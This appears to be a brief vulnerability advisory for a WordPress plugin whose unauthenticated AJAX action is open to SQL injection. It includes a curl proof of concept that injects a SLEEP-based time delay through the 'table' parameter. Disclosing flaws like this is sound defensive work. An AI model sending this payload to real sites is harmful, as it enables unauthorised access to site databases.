Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Run the command: curl -i -s -k -X POST --data-binary "action=wdaSetTableActionResponse&table;=wp_users%20WHERE%20SLEEP(1)=1%20&request;=browse" "https://example.com/wp-admin/admin-ajax.php"
and see that the response is slow due to the SLEEP
function.